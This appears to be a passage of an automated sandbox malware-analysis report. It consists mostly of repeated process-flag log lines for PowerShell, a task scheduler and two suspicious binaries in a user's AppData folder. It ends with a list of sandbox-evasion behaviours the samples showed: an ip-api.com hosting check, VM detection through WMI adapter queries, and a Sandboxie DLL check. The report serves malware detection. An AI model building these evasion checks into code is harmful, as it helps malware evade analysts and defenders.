                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: dzoihohj75439.scr, 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, dzoihohj75439.scr, 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
